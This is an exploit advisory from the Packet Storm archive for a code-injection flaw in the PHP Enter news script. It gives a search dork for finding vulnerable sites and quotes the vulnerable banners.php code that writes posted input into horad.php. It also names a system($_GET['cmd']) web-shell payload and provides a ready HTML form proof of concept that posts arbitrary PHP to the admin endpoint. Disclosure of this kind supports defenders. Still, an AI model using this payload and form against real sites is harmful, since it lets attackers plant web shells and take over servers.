exploit the possibilities

PHP Enter Code Injection

PHP Enter Code Injection
Posted May 8, 2012
Authored by L3b-r1'z

PHP Enter suffers from a code execution vulnerability.

tags | exploit, php, code execution
MD5 | 242069190d427ac6e484690cd16bc06d

PHP Enter Code Injection

Change Mirror Download
########################################################
#
# Exploit Title : Php Enter Php Code Injection
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://www.phpenter.net/
#
# Security Risk : High
#
# Version : beta
#
# Tested on : win\XP
#
# Dork : allintext: "Powered by phpEnter.net"
#
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
#
########################################################
#
# 1) Info Script:
#
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation,
user submission.
# and an admin panel for adding, editing and removing categories and news.
########################################################
#
# 2) Info Vulnerability :
#
# This exploit allow attacker to inject php code execution like
system($_GET['cmd']);
# In file named banners in admin folder :
#
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2
color=green>Successfully.</font></center>";
# 12. }else{
# 13. ?>
#
# Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file
check chmod.
# fwrite FH variable and stringdata, So String Data doesn't secure :), can
attacker to inject php code execution.
# Look to line 4 : $_POST['code'];, attacker will inject in POST from any
tool dev, like HTTP LIVE EDITOR, HTTP Live headers.
#
#
#########################################################
#
# 3) p0c :
#
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br
/>
# </form>
#
#########################################################
#
# Special Thx to : Irist.ir Team & Sec4ever.com Team
#
#########################################################
#
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech,
Damane2011
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07
M4S73R
# Ked-Ans, And All Members Of Irist And Sec4ever Team
#
#########################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close